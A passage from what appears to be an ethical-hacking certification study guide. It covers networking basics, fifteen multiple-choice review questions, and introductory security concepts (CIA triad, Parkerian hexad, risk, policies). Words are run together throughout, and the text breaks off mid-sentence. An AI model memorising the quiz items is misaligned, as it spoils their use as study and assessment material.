NetworkingFoundations■SummaryNetworkingcomputersystemshasfundamentallychangedthewaywedobusiness,work,andlive.It’sallhappenedinaveryshorttime.Computernetworkshavealsoprovidedeasymeansforpeopleandbusinessestobeattackedremotely.Theyhavechangedthefaceofhowsomecriminalorganizationsoperate.Theyprovideaneasywaytoperpetratefraudandtheft.It’sbecauseofallofthis,andalsobecausemuchofwhatwe’llbetalkingaboutincomingchaptersreliesonnetworks,thatitcanbereallyhelpfultounderstandthefundamentalsofcomputernetworking.Conceptualframeworkscanhelpwithunderstandinghowcommunicationbetweensystemsandapplicationstakesplace.Therearetwoframeworks,ormodels,thatarecommonlyreferredto.ThefirstistheOSImodel.Ithassevenlayers—­Physical,DataLink,Network,Transport,Session,Presentation,andApplication.Everysystemthatisonanetworkhasfunctionalitythatcanbemappedtoeachofthoselayers.Onethingtokeepinmindasyouarethinkingaboutthesemodelsisthatalayerononesystemcommunicateswiththecorrespondinglayeronthesystemwithwhichit’scommunicating.TheNetworklayerinthesentmessageishandledbytheNetworklayeronthereceivingside,forexample.Theothermodel,perhapsthoughtofasanarchitecture,isTCP/IP.ThisissometimescalledtheDARPAmodelbecausetheARPAnetwheretheprotocolsuitewasdevelopedwasfundedbyDARPA.UnlikeOSI,whichwasdevelopedentirelyconceptually,TCP/IPdescribesanas-­builtdesign.RatherthansevenlayersasinOSI,TCP/IPhasfourlayers,thoughthosefourlayersencompassthesamesetoffunctionalities.TCP/IPincludestheLink,Internet,Transport,andApplicationlayers.TheLinklayeroftheTCP/IParchitectureencompassesthePhysicalandDataLinklayersfromtheOSImodel,whiletheapplicationlayertakesintheSession,Presentation,andApplicationlayersfromtheOSImodel.It’softeneasiertoviewnetworklayoutsconceptuallyratherthanphysically.Therearetopologiesthatarecommonlyused.Abusnetworkhasasinglebackbonecabletowhicheverythingconnects.Astarnetworkhasacentralaccessdevicelikeaswitchorhubandalldevicesconnectbacktothat.Aringnetworkisactuallywired,commonly,likeastarbutitbehaveslikearingwheremessagestravelaroundtheringlookingforthesystems.Therearealsomeshnetworks,wheretherearedirectconnectionsfromonedevicetoanother.Inafullmeshnetwork,everydevicehasaconnectiontoeveryotherdeviceinthenetwork.You’llalsoseehybridnetworksalot.Acommonhybridisthestar-­bus,wherethecentralaccessdevices,likeaswitch,areallwiredtogetherthroughabus.TheInternetrunsontheTCP/IPsuite,andmostbusinessesalsouseTCP/IPthesedays.Whenlookingatsystemcommunications,youwillrunacrossprotocolslikeEthernetthattakecareofconnectingendpointslikedesktopcomputerstothenetwork.EthernetcommunicationhappensthroughtheuseofMACaddresses.AnydeviceonalocalnetworkwantingtocommunicatewithanotherdeviceonthesamelocalnetworkwoulddoitusingtheMACaddress.AttheNetworkorInternetlayeristheIP.IPisabest-­effortdeliveryprotocol,meaningthattheprotocolhasmechanismsthathelpensurethatmessages(calledpackets,whichisSummary 53theprotocoldataunitatthislayer)cangetfromthesourcetothedestination.ThesemechanismsareexpressedinaseriesofheaderfieldslikethesourceanddestinationIPaddressesandtheIPidentificationfield,incasepacketsneedtobefragmented.TheTCPandUDPareattheTransportlayer.Theyprovideportstoenablemultiplexing—­meaningmultipleapplicationscanmakeuseofnetworkfunctionalityatthesametimebylisteningonadifferentportthantheportonwhichanotherapplicationlistens.TCP,whosePDUiscalledasegment,usesathree-­wayhandshakeandalsosequencenumberstoguaranteedeliveryofmessagesinthecorrectorder.TCPusesaconnection-­orientedmodel.UDP,ontheotherhand,whosePDUisadatagram,isanunreliableandconnectionlessprotocol.UDPdatagramsdon’thavetobeacknowledgedorrepliedto.Different-sizednetworksarereferredtoindifferentways.ALANwouldbeanetworkthatiscontainedwithinasmallgeographicarealikeafloor,building,orcampus.AMANislargerthanaLAN,coveringperhapsanentirecity,butsmallerthanaWAN.AWANcoversalargegeographicarea,liketheUnitedStates.Thismaybeusedbyaverylargebusinessthatconnectsallofitsofficestogether.Aserviceprovider’snetworkwouldalsobecalledaWAN.Cloudcomputingisoftenusedbybothindividualsandbusinesses.YoucanusecloudstoragelikeGoogleDrive,Microsoft’sOneDrive,orDropbox.YoucanalsocreateanentirebusinessinfrastructurenetworkusingIaaS.ThisisavailablefromcompanieslikeGoogle,Amazon,andMicrosoft,whichalloffervirtualmachinesthatcanbeprovisionedandturnedupveryquickly.Businessescanmakeuseoftheseservicestoprovideservicesoutsideoftheirinternalnetworks.Theycanbeusedasaquickfallbacktoexistinginfrastructure.Additionally,smallstartupsdon’thavetoinvestalotofcapitalinsystems.Theycanpayforwhattheyusewhentheydevelopnetwork-­facingapplications,likewebservices.Companiescanalsousethesecloudproviderstosupportandmanageembeddeddeviceslikethermostats,garagedooropeners,DVRs,andothersimilardevices.AmazonandMicrosoftbothhaveIoTsupportsystems.Theycanbeusedtoregister,manage,andcommunicatewithawidevarietyofdevicesthatareconnectedtohomeandbusinessnetworksaroundtheworld.54 Chapter2  NetworkingFoundations■ReviewQuestionsYoucanfindtheanswersintheappendix.1.WhichofthesedeviceswouldnotbeconsideredpartoftheInternetofThings?A.SmartphoneB.ThermostatC.LightbulbD.Set-­topcablebox2.Ifyouwantedalightweightprotocoltosendreal-­timedataover,whichofthesewouldyouuse?A.TCPB.HTTPC.ICMPD.UDP3.Whatorder,frombottomtotop,doestheTCP/IParchitectureuse?A.NetworkAccess,Network,Transport,ApplicationB.Link,Internet,Transport,ApplicationC.Physical,Network,Session,ApplicationD.DataLink,Internet,Transport,Application4.Whichoftheseserviceswouldbeconsideredastorageasaservicesolution?A.MicrosoftAzureB.iCloudC.GoogleComputeD.DropLeaf5.TheUDPheaderscontainwhichofthefollowingfields?A.Sourceaddress,destinationaddress,checksum,lengthB.Destinationport,sourceport,checksum,lengthC.Flags,sourceport,destinationport,checksumD.Length,checksum,flags,address6.WhatarethethreestepsintheTCPhandshakeasdescribedbytheflagsset?A.SYN,SYN/URG,RSTB.RST,SYN,ACKC.SYN,SYN/ACK,ACKD.SYN,SYN/ACK,ACK/URGReviewQuestions 557.WhichoftheseprotocolswouldbeusedtocommunicatewithanIoTdevice?A.ICMPB.SMTPC.TelnetD.HTTP8.Whichnetworktopologyareyoumostlikelytorunacrossinalargeenterprisenetwork?A.RingtopologyB.BustopologyC.FullmeshD.Star-­bushybrid9.Ifyouweretoseethesubnetmask255.255.252.0,whatCIDRnotation(prefix)wouldyouusetoindicatethesamething?A./23B./22C./21D./2010.Whichoftheseaddresseswouldbeconsideredaprivateaddress(RFC1918address)?A.172.128.10.5B.9.10.10.7C.172.20.128.240D.250.28.17.1011.Ifyouwerelookingforthedefinitivedocumentationonaprotocol,whatwouldyouconsult?A.RequestforcommentsB.ManualpagesC.StandardsD.IEEE12.ThePDUforTCPiscalleda______________.A.PacketB.DatagramC.FrameD.Segment13.WhichheaderfieldisusedtoreassemblefragmentedIPpackets?A.SourceaddressB.IPidentificationC.Don’tfragmentbitD.Acknowledgmentfield56 Chapter2  NetworkingFoundations■14.Whichprotocolisnecessarytoenablethefunctionalityoftraceroute?A.HTTPB.SNMPC.ICMPD.IP15.WhatisaMACaddressusedfor?A.AddressingsystemsoveraVPNB.AddressingsystemsthroughatunnelC.AddressingsystemsoverTCPD.AddressingsystemsonthelocalnetworkChapter3SecurityFoundationsTHEFOLLOWINGCEHTOPICSARECOVEREDINTHISCHAPTER:✓✓Networksecurity✓✓Firewalls✓✓Vulnerabilityscanners✓✓Securitypolicies✓✓Securitypolicyimplications✓✓Informationsecuritytools✓✓InformationsecurityattackdetectionOrganizationsgenerallyspendalotoftimeandmoneyondefensesandmitigationsagainstattacks.Therearesomefundamentalconceptsthatgointotheplanningandimplementationofthesedefenses.Inthischapter,we’regoingtocoversomeofthesubjectmatterthathelpssecurityprofessionalsmakedecisionsabouthowbesttoprotectenterprises.Someofthisisfoundational,butit’snecessaryinordertobuildonit.Bytheendofthechapter,you’llhavethebasicsbehindyou,andwe’llhavestartedtotalkabouthard,defensivemechanisms.Youwillrunacrossmanyoftheseifyouareactingasanethicalhacker.First,youneedtounderstandwhatismeantbyinformationsecurity—­whateventsfallintothesecuritybucket.TheseideasarecommonlyreferredtoasthetriadortheCIAtriad.It’sanessentialconceptforpeoplewhoholdaCertifiedInformationSystemsSecurityProfessional(CISSP)certification,whichisacertificationthatcoverstheentiregamutofinformationsecuritytopics.Thetriadisagoodfoundationtounderstandingsomuchelseaboutinformationsecurity.Alongsideknowingwhatyouareprotectingagainst,youneedtoknowwhatyouareprotecting.Performingriskassessmentswillhelpwiththat.Identifyingpotentialrisksandassociatedpotentiallossescanhelpwithdecision­makingaroundwheretoexpendlimitedresources—­budget,staffing,capitalexpenditures,andsoon.Itwillalsohelpsecurityprofessionalsdeterminewhatpoliciestheyneedinplacetoguidetheactionsofemployeesoveralland,morespecifically,informationtechnologystaff.Frompoliciesflowstandardsandprocedures.Theyareallconsideredessentialfordetermininghowacompanyapproachesprotectingitsinformationassets.Onceyouhaveyourpoliciesinplace,decisionscanbemadeabouthowbesttoprotectinformationresources.Beyondstaffing,thereistechnologythatcanbebroughttobear.Thereareanumberofdevicesthatcanbeplacedintoanetworktohelpwithinformationprotection.Thesearemeantnotonlytokeepattackersoutbutalsotoprovideinformationthatcanbeusedtoidentifyintrusions,includingthepathanattackermayhavetakentogainaccesstonetworksandsystems.Theremayalsobeelementsthatareplacedinthenetworkthatcanautomaticallydetectanintrusionattemptandthenblockthatattempt.Thetechnologyalonedoesn’tprovideprotection.Wheretheseelementsanddevicesareplacedisimportant,andthosedecisionsaremadebasedonideassuchasdefenseindepthanddefenseinbreadth.Theseideashelptodefineacompletesecurityarchitecture.Alongsidethesecuritydevices,therearesystem-­levelmechanismsthatcanbeveryhelpfulinprovidingmorecontexttotheinformationprovidedbyfirewallsandintrusiondetectionsystems.Alloftheseelementsanddecisionstogetherareneededtocreateacompletedefenseoftheenterprise.TheTriad 59TheTriadThetriadisasetofthreeattributes,orproperties,thatdefinewhatsecurityis.Thethreeelementsareconfidentiality,integrity,andavailability.Eachofthesepropertiesneedstobetakenintoconsiderationwhendevelopingsecurityplans.Eachofthem,tovaryingdegreesofimportance,willbeessentialinplanningdefenses.Noteverydefensewillincorporateeachofthethreepropertiestothesameextent.Somedefensesimpactonlyoneproperty,forinstance.Fromanattackperspective,atesteroradversarywouldbelookingtocompromiseoneoftheseelementswithinanorganization.YouwillcommonlyseethesethreeelementsreferredtoastheCIAtriad.ThisisnotintendedtobeconfusedinanywaywiththeCentralIntelligenceAgency.Figure 3.1showsthethreeelementsrepresentedasatriangle,asthetriadisoftendepicted.Onereasonitisshownthatwayisthatwithanequilateraltriangle,allthesidesarethesamelength.Theyhavethesamevalueorweight,whichismeanttodemonstratethatnoneofthepropertiesofthetriadisanymoreimportantthananyoftheotherproperties.Theyallhaveequalvaluewhenitcomestotheoverallsecuritypostureofanorganization.Differentsituationswillhighlightdifferentelements,butwhenitcomestotheoverallsecurityofanorganization,eachisconsideredtohaveequalweighttohaveawell-­balancedapproach.entnfidCoityegrIntialityFIGURE 3.1 TheCIAtriadAvailabilitySomethingelsethatmightoccurtoyou,asyoulookatthefigure,isthatifanyofthesidesareremovedorcompromised,it’snolongeratriangle.Thesameistruewhenitcomestoinformationsecurity.Ifanyofthesepropertiesisremovedorcompromised,thesecurityofyourorganizationhasalsobeencompromised.Ittakesallofthesepropertiestoensurethatyouandyourinformationarebeingprotected.ConfidentialityPerhapsweshouldgobacktokindergartenforthis,thoughyoumayhavemorerecentmemoriesorexperiencesthatapply.Therearealwayssecretswhenyou’reyoung,andit60 Chapter3  SecurityFoundations■seemsliketheyarealwayssharedinveryconspiratorial,whisperedtonesontheveryedgeoftheschoolyard.Youexpectthatwhenyoushareasecretwithyourfriend,thatsecretwillremainbetweenyouandyourfriend.Imagine,afterall,ifyouweretotellyourfriendthatyoureally,really,reallylikedthepersonwhosatbehindyouinclassandyourfriendweretotellthatperson.Thatwouldbemortifying,thoughthemortificationlevelwouldlikelybeininverserelationshiptoyourage.Whenyourfriendsharesyoursecret,assumingtheydo,theyhavebreachedyourconfidence.Thesecretyouhavesharedwiththemisnolongerconfidential.Youwon’tknowwhetheryoucancontinuetotrustyourfriend.Oneofthechallengesisthatyoumighthavesharedyoursecretwithtwofriends.Youthenhearaboutthesecretfromsomeoneelsealtogether.Youdon’tknowwithoutprobingfurtherwhichfriendmayhavebeentheonetotell.Allyouknowisthatconfidentialityhasbeenbreached.Inthedigitalworld,confidentialitystillmeanskeepingsecrets,sonothingmuchchangesthere.This,though,encompassesalotofdifferentaspects.Itmeansmakingsurenoonegetsunauthorizedaccesstoinformation.Thismaymeanusingstrongpasswordsonyouruseraccountstomakesureattackerscan’tgetin.Itmaymeankeepingcertaininformationofflinesoitcan’tbeaccessedremotely.Commonly,though,asimplewaytoachieveconfidentialityisthroughtheuseofencryption.Whenwearetalkingaboutconfidentialityhere,weshouldbethinkingaboutitintwodimensions—­staticanddynamic.Staticwouldbeprotectingdatathatisconsidered“atrest,”whichmeansit’snotmoving.Itisprobablystoredondiskandnotbeingusedormanipulated.Thesecondtype,dynamic,iswhenthedataismoving,or“inmotion.”Thisreferstodatawhenitisbeingsentfromoneplacetoanother.Thismayincludeyourwebbrowseraskingforandthenretrievinginformationfromawebserver.Asthedataisbeingtransmitted,itisinmotion.It’sthistransmissionthatmakesitdynamicandnotnecessarilythatitisbeingaltered,thoughdatabeingsentfromoneplacetoanothercoulddefinitelybeexperiencingalterationthroughinteractionwiththeuserandtheapplication.Whenwearemakinguseofencryptionforweb-­basedcommunication,theSecureSocketsLayer/TransportLayer(SSL/TLS)securityprotocolsareused.WhileTLShaslongsincesupersededSSL,itisstillsometimesreferredtoasSSL/TLS.Regardlessofhowit’sreferredto,though,itisasetofmechanismsforencryptingdata.SSLandTLSbothspecifyhowtogenerateencryptionkeysfromdatathatisknown,aswellassomepartialdatathatistransmittedfromonesidetotheother.Sinceencrypteddatacan’tbereadwithoutakey,theconfidentialityofthedataisprotected.Thisisnottosaythatencryptionguaranteesconfidentiality.Ifanattackercangettothekeyinsomeway,theattackercanthendecryptthedata.Ifthedataisdecryptedbysomeonewhoshouldn’thaveseenit,confidentialityhasofcoursebeencompromised.Attacksagainsttheencryptionmechanisms—­ciphers,keyexchangealgorithms,andsoon—­canalsoleadtoacompromiseofconfidentiality.Asuccessfulattackagainsttheencryption,andtherehavebeensuccessfulattacksagainstvariousencryptionmethodsandstandards,willleadtociphertextbeingdecrypted.TheTriad 61IntegrityInadditiontohavingdatabeconfidential,wealsogenerallyexpectittobethesamefromthemomentwesendittothemomentit’sreceived.Additionally,ifwestorethedata,weexpectthesamedatatobeintactwhenweretrieveit.Thisisaconceptcalledintegrity.Dataintegrityisimportant.Itcanbecompromisedindifferentways.First,datacanbecorrupted.Itcanbecorruptedintransit.Itcanbecorruptedondiskorinmemory.Thereareallsortsofreasonsdatagetscorrupted.Manyyearsago,Istartedgettingalotofcorrupteddataonmydisk.Ireplacedthediskandstillgotalotofcorrupteddata.Intheend,itturnedoutthatIhadbadmemory.Thebadmemorywascausingdatabeingwrittenouttodisktobecorrupted.Badcomponentsinacomputersystemhappen,andthosebadcomponentscanresultindatalossorcorruption.Sometimes,mistakeshappenaswell.Perhapsyouhavetwodocumentsupandyouareworkinginthematthesametime.Oneofthemisascratchdocumentwithnotesfortherealdocument.Youmistakenlyoverwriteasectionoftherealdocument,thinkingyouareinthescratchdocument,andthen,becauseyoudon’ttrustautosave,yousavethedocumentyouareworkingin.Thismightbeconsideredalossofdataintegritybecauseimportantpiecesofthedocumentyouareworkinginhavebeenaltered.Ifyoudon’thaveabackupfromwhichtoreplacedata,youmaynotbeabletorecovertheoriginal,anditcouldbethatyoudon’tevennoticethemistakeuntilthedocumenthasbeensentaroundtheofficewiththetextcontainingthemistakeinit.Suddenly,informationisbeingsharedthatisincorrectinsomeway.Aman-­in-­the-­middleattackisonewayforanattackertocompromiseintegrity.Theattackerinterceptsthedataintransit,altersit,andsendsitontheway.Whenyoubrowsetoawebsitethatusesencryption,acertificateisusedtoprovidekeying,meaningthecertificateholdskeysusedforencryptionanddecryption.Whenacertificatecontainsanamethatisdifferentfromthehostnamebeingvisited,yourbrowserwillgenerateanerror,asyoucanseeinFigure 3.2.FIGURE 3.2 Anerrormessageaboutanapparentlyinvalidcertificate62 Chapter3  SecurityFoundations■Whatthecertificatesays,thoughit’snotshownintheerror,isthatitbelongstowww.furniturerow.com.However,thewebsitethatwasvisitedwaswww.sofamart.com.Ifyoudidn’tknowthattheFurnitureRowcompanyownedSofaMart,youmightbegintoquestionwhetheryouwerebeinghijackedinsomeway.Anattackinthissituationmayhaveresultedinanattackergatheringinformationfromyoursession,whichyouwouldn’thaveexpectedbecauseyoubelievedthesessionwasencrypted.Worse,theinformationyougotcouldhavebeenalteredwhiletheattackergottherealinformation.Therearemanycaseswherethatmaybearealisticscenario.Integrity,itturnsout,isverycomplex.Therearesomanycaseswhereintegritycanbeviolatedandwe’veonlyscratchedthesurface.Integrityisn’tonlyaboutthecontentsofthedata.Itmayalsobetheintegrityofthesourceoftheinformation.Imaginewritingaletteranddigitallyaddingasignaturesoitappearstohavebeenwrittenbysomeoneelse.Whenyoustartthinkingaboutintegrity,youmaycomeupwithmanyexamples.AvailabilityThisisperhapstheeasiesttounderstandandoneofthemostcommonlycompromisedproperties.Itcomesdowntowhetherinformationorservicesareavailabletotheuserwhentheyareexpectedtobe.Aswiththeotherproperties,thismaybeacaseofmistakesandnotnecessarilymalicious.Ifyouweretokeepinformationonanexternaldrive,thengosomewhere—­work,onsitewithaclient—­andforgettobringthedrive,thefilesonthatdrivewouldn’tbeavailable.Itwouldn’tbemalicious,butitwouldstillbeafailureofavailabilitysinceyouwouldn’tbeabletoaccesswhatyouneedwhenyouneedit.Youhaven’tlostthedata.It’sstillintact.Itjustisn’twhereyouneeditwhenyouneedittobethere.That’sabreachofavailability.Misconfigurationscanresultinproblemsofavailability.Makingachangetoaserviceconfigurationwithouttestingthechangemayresultintheservicenotcomingbackup.Inproduction,thiscanbeveryproblematic,especiallyifit’snotclearthattheservicefailed.Someserviceswillappeartohaverestartedwheninfacttheconfigurationcausedtheservicestarttofail.Evenifit’sashortperiodoftimebeforethechangehasbeenrolledback,thereisapossibilityofusersoftheservicenotbeingabletoperformthefunctionstheyexpect.Recently,Iwasreadingaboutacaseofaclusterwheresixoutofthesevendevicestookanupgradecleanlywhiletheseventhdevicewasstillontheoldercode.Becausethereweresomeincompatibilitieswiththecommunicationbetweentheoldercodeandthenewercode,allthedeviceswentintoabadloop,shuttingoutalllegitimaterequests.Maliciousattacksarecommonaswell.Adenial-­of-­service(DoS)attackdeniesaccesstoaservice,whichtranslatestotheservicebeingunavailableforlegitimatetraffic.Attackerscanoverwhelmtheservicewithalotofrequests,makingitdifficultfortheservicetorespond.Alegitimaterequestwouldhaveahardtimegettingthroughthenoise,andeveniftherequestgotthrough,theservicemaynotbeabletorespond.DoSattackshavebeencommonfordecadesnow,thoughthechangeinavailablebandwidthandothertechnologychangesmeanthattheattackshavehadtochangealongwiththetechnologyandbandwidthincreases.TheTriad 63ParkerianHexadNoteveryonebelievesthatthreepropertiesaresufficienttoencompassthebreadthofinformationsecurity.In1998,DonnParkerextendedtheinitialthreepropertiesbyaddingthreemore.Thesearenotconsideredstandard,becausethereissomedebateastowhetherit’snecessarytobreaktheadditionalpropertiesout.ThethreeadditionalpropertiesParkerbelievesarenecessaryareasfollows:Possession(orControl)  Ifyouhadmistakenlyhandedtheexternaldrivementionedearliertoafriend,thinkingyouwerehandingthembacktheirdrive,thedrivewouldbeintheircontrol.Ifthefriendneverpluggedthedriveintolookatit,thedataonitwouldnotbesubjecttoabreachofconfidentiality.However,thefactthatthedriveisnotinyourcontrolanylongerdoesmeanthatitisnotavailabletoyou,meaningitisalossofavailability.Thisisonereasonthispropertyisn’tincludedintheprimarytriad,thoughitcanbeanimportantdistinction.Authenticity  Thisissometimesreferredtoasnonrepudiation.Theideaofauthenticityisthatthesourceofthedataordocumentiswhatitpurportstobe.Asanexample,whenyoudigitallysignanemailmessage,therecipientcanbecertainthatthemessageoriginatedfromyoubecausethemessageincludesyourdigitalsignature,whichnooneelseshouldhave.Ofcourse,inreality,allweknowisthatthemessagewassignedwithyourkey.Ifyourkeywasstolenorgivenaway,itcouldbeusedwithoutyou.Authenticityismakingsurethatwhenyougetapieceofdata,nomatterwhatitis,it’sactuallyfromwhereitpurportstobefrom.Utility  Let’ssayyouhavethatsameexternaldrivewe’vebeentalkingabout.It’snowmanyyearslater,andit’sbeeninadrawerforalongtime.It’sjustthedrive,though.Thereisnocablewithitbecausetheygotseparated.Youdon’thavethecableanymore,andadditionally,theinterfacesonyourcomputerhaveallchangedsincethelasttimeyouusedit.Nowyouhavedata,butitcannotbeused.Ithasnoutility.Personally,Ihaveanoldnine-­tracktapesittinginatubinthebasement.I’vehaditfordecades.It’scompletelyuselesstomebecauseIdon’thaveatapedriveoramainframetoreaditto.Additionally,it’slikelystoredinEBCDICandnotASCII.Allofthismakesthedataonthattapeuseless,despitethatitisinmypossessionandtechnicallyavailabletome.Whilethesepropertiesdoraisespecificideasthatareimportanttothinkabout,youcouldalsofitthescenariosintothethreepropertiesthatarepartoftheCIAtriad.Possessionandutilitysituationscouldbesaidtofallunderavailability,andauthenticitycouldbeplacedunderintegrity.Afterall,ifthesourceofapieceofdataissaidtobeonethingwheninfactitisn’t,theintegrityofthedataisinvalid.WhatyougetwiththeParkerianhexadissomespecificcasesratherthanthebroaderconceptsfromtheCIAtriad.Ifit’smoreusefulforyoutobreakthemoutfromtheothersasyouarethinkingaboutwhatsecuritymeansandwhateventsaresecurity-­related,thehexadmaybemoreusefulforyouthanthetriad.64 Chapter3  SecurityFoundations■RiskVerysimply,riskistheintersectionoflossandprobability.Thisisacondensedidea,anditcantakealottounpack,especiallygivencommonmisunderstandingsofwhatriskis.AlongerversionofthissentimentisfoundinthedefinitionofriskatDictionary.com,whichsaysthatriskis“theexposuretochanceofinjuryorloss.”Thechanceinthedefinitionistheprobability,whichismeasurable.Lossorinjuryisalsomeasurable.Thismeanswecanapplynumberstoriskanditdoesn’thavetobesomethingamorphousorvague.Often,youwillseethetermriskusedwhenwhatthespeakerreallymeanstosayischance,orprobability.Someonemaysaythereisariskofsomeeventhappening.Whatisreallymeantisthatthereisaprobabilityofthateventhappening,andpresumably,theeventisonethatcouldbeperceivedasnegative.Probabilitiescanbecalculatedifyouhaveenoughdata.Averysimplewaytocalculateprobability,whichiscommonlyexpressedasaratio,istodividethenumberofeventsbythenumberofoutcomes.Asanexample,whatistheprobabilityofanydayinAprilfallingonaweekend?Thereare30 daysinApril.That’sthenumberofoutcomes.Astherearetypically8 weekenddaysina30-­daymonth,thenumberofeventsis8.Theprobabilitythenis8/30,or8outof30.Ifyouwantedto,youcouldreducethatto4outof15,but8outof30saysthesamething,andit’sclearertoseewheretheinformationcamefrom.Ifyouwantedtorefinethat,youcouldaskaboutaspecificApriltoseeif,basedonhowthedaysaligned,thereweremorethan8 weekenddaysthatyear.Probabilitiesofinformationsecurityeventsarehardertocalculate.Whatistheprobabilityofyourenterprisebeinghitbyadistributed(basedontheacronymyouareusing)denial-­of-­serviceattack?AccordingtoImpervaIncapsula,usingitsonlineDDoSDowntimeCostCalculator,theprobabilityofa2,500-­personcompanythatisinthee-­commercebusinessgettinghitwithaDDoSis36percent.That’s36eventsoutof100outcomes.Inthiscontext,westartgettingveryamorphous.Whatisaneventhere?Whatisanoutcome?Forevery100connectionattemptstoyournetwork,36 willbeDDoSmessages?Thatdoesn’tmakesense.AsIsaid,calculatingtheprobabilityofriskischallenging,andevenifyoudo,itmaybehardtounderstandtheresultsyouget.Lossis,perhaps,easiertoquantify,thougheventhereyoumayrunintochallenges.Let’ssaythatyourbusinesshasbeencompromisedandsomeofyourintellectualpropertyhasbeenexfiltrated.Sincetheintellectualpropertyisn’tgone,meaningyoustillhaveitinyourcontrol,whatisthetangibleloss?Itdependsonwhotookitandwhattheytookitfor.Ifsomeoneinanothercountrytookitandyourbusinessdoesn’tsellanyproductthere,isthereanactualloss?Certainly,therearecostsassociatedwithcleanup.Eventhere,though,itcanbechallenging.Somuchissoftcosts.Ifyoudon’tbringinanoutsidecontractortodothecleanupforyou,youareusingyourownpeople,whomyouarealreadypaying.Anoutsidecontractorwillhavehardcostsintheformofabillyourcompanywillbeexpectedtopay.Thatwillcomeoutofyourbottomline,sothereis,forsure,anumberthatcanbeappliedtolossthere.Howdoyoucalculatethecostofcleanupifit’syourownpeople,though?You’realreadypayingthem,sothecostisindeferredactionsonotherprojects.Risk 65Now,weknowwecangetvaluesforlossandforprobability.Wecancalculateriskfromthosetwovaluesbymultiplyinglossbyprobability.Youendupwith$risk=probability*loss.Thedollarsignisincludedintheretobeclearaboutthetermssoyouknowwhattheendresultmeans.Theriskvalueyouendupwithisindollars.Thisvalueismoremeaningfulinacomparativeway.Youcancomparetheriskofdifferenteventsbyusingquantitativecomparisonifyouknowthemonetaryvalueofthelossandtheprobability.Thismeansyouarenotcomparingjustlossandnotjustprobability.Itcanbetemptingtothinkaboutriskasloss.Ahigh-­riskeventtosomeisonewherethereisacatastrophicoutcome.Thisisthewayourbrainsarewired.Ourbrainslookforbadthingsandtrytoavoidthem.Becauseofthat,ifyouweretoasksomeonewhatahigh-­riskeventintheirlivesis,outsideofinformationsecurity,theymaywellgiveyouanexampleofaneventthatmayresultindeath,likedriving.Theydon’ttakeintoaccounttheactualprobabilityofacatastrophiceventhappening.Theyonlythinkaboutthepotentialoutcomeatitsmostextreme.Thisiscalledcatastrophizing.It’snothelpfulwhenwearetryingtoevaluateriskinaninformationsecuritycontext.Riskisusedasawayofidentifyingwhatisimportant.Thegoalofanyinformationsecurityprogramistoprotectwhatisimportantandvaluable.Onewaytoquantifywhatisvaluableisthroughthelossnumber.Higherlossmaymeanhighervalue.Whenyoucalculatetheoverallriskvalue,youcandeterminewheretoapplyyourresources.Ifyouhaveaneventthathasahighriskvalue,itisprobablyagoodideatoapplyresourcestoprotectagainstthatevent.Ofcourse,predictingeverypossibleeventcanbechallenging.Thisiswhatmakesinformationsecuritydifficult—­understandingevents,probabilities,andoutcomesforyourorganizationandthenplanningtoprotectagainstnegativeevents.Whenitcomestorisk,thereareotherconceptsthatareimportanttoconsider.Thefirstisthreat.Athreatissomethingthathasthepossibilitytoincurabreachofconfidentiality,integrity,oravailability.Theavenuethisbreachmaytakeiscalledavulnerability.Avulnerabilityisaweaknessinasystem.Thismaybeitssoftware,itsconfiguration,orhowtheentireinformationsolutionisputtogether.Whenthevulnerabilityistriggered,itiscalledanexploit.Weexploitvulnerabilities,thoughnotallvulnerabilitiescanbeexploited.Raceconditionsareexamplesofvulnerabilitiesthatmaynotbeabletobeexploited.Acodereviewshowsthatthereisaproblemandtheresultoftheproblemcouldresultindatacorruption,forexample.However,becauseofthespeedatwhichtheprogramexecutes,it’sessentiallyimpossibletositinbetweenthetwoinstructionstomakethechange.Certainlynotallvulnerabilitiescanbeexploitedbyeveryone.Araceconditionisaprogrammaticsituationwhereoneprocessorthreadiswritingdatawhileanotherprocessorthreadisreadingthatdata.Iftheyarenottightlyinsync,it’spossibleforthedatatobereadbeforeit’swritten.Itmayalsobepossibletomanipulatethedatainbetweenwritingandreading.Atitscore,araceconditionisasynchronizationproblem.Athreatagentorthreatactorisanentity,likeapersonorgroup,thatcaninstantiateathreat.Thethreatagentiswhomanifestsathreat.Thepathwaythethreatagenttakesto66 Chapter3  SecurityFoundations■exploitavulnerabilityiscalledthethreatvector.Alloftheseconceptsareimportantbecausetheyhelptobetterunderstandwhererisklies.Onceyouhaveidentifiedwhatresourcesyoucareabout,youshouldthinkaboutwhatthreatagentsmaycareaboutthoseresources.Thiscanhelpyoutoidentifypotentialvulnerabilities.Onceyouknowwhatyourvulnerabilitiesareandthepotentialthreatvectors,youcanstarttothinkabouthowyouaregoingtoprotectagainstthosethreats.Policies,Standards,and ProceduresWhilewe,asinformationsecurityprofessionals,canoftenthinkaboutsecurityforthesakeofsecurityasthemostimportantthing,thefactisthatsecurityisabusinessenabler,notabusinessdriver.Thismeanssecurity,inmostcases,doesn’taddtothebottomline.Thelackofsecurityoraweaknessinsecuritycantakeawayfromthebottomline.Becausesecurityisabusinessenabler,thebusinesssetstheparametersaroundwhatisimportantandthemeanstoprotectwhatisimportant.Itdoesthatbycreatingpolicies.Oncethepoliciesarecreated,standardsarebuiltoutofthosepolicies.Closesttowheretheworkactuallygetsdoneareprocedures.Thesearedevelopedbecauseofwhatthestandardssay.SecurityPoliciesAsecuritypolicyisastatementofintentionwithregardtotheresourcesofabusiness.Itdefineswhatacompanyconsiderstobesecurity—­whatresourcesneedtobeprotected,howresourcesshouldbeutilizedinapropermanner,howresourcescanorshouldbeaccessed.Thesepoliciesareessentialtogoodcorporategovernance,sincethepoliciesarelinesthatmanagementdraws.Thismeansthathavingmanagementsetthetoneanddirectionisnotonlyagoodidea,it’salsorequired.Managementandtheboardofdirectorshaveanobligationtothestakeholdersinthebusiness—­theindividualownersortheshareholders.Securitypoliciesarenotonlyaboutdefiningimportantresources,theyarealsoaboutsettingexpectationsofemployees.Manyorganizations,forexample,haveanacceptableusepolicy.Thisisaboutdefiningwhatuserscanandcannotdo.Anyviolationofthispolicyonthepartoftheemployeeisgenerallycauseforsanctionortermination,dependingontheextentoftheviolationandtheimpacttothebusiness.Ofcourse,notallpoliciesaredirectlyabouttheusersandtheirbehaviors.Theremaybeothersecuritypoliciesthataremoredirectedatinformationtechnologyorinformationsecuritystaff.Keepinmindasyouarethinkingaboutsecuritypolicythatthegoalsofyourpoliciesshouldbetheconfidentiality,integrity,andavailabilityofinformationresources.Thesearethepropertiesthatasecuritypolicyshouldtakeintoaccount.Allinformationresourcesshouldbeconfidential,haveintegrity,andbeavailab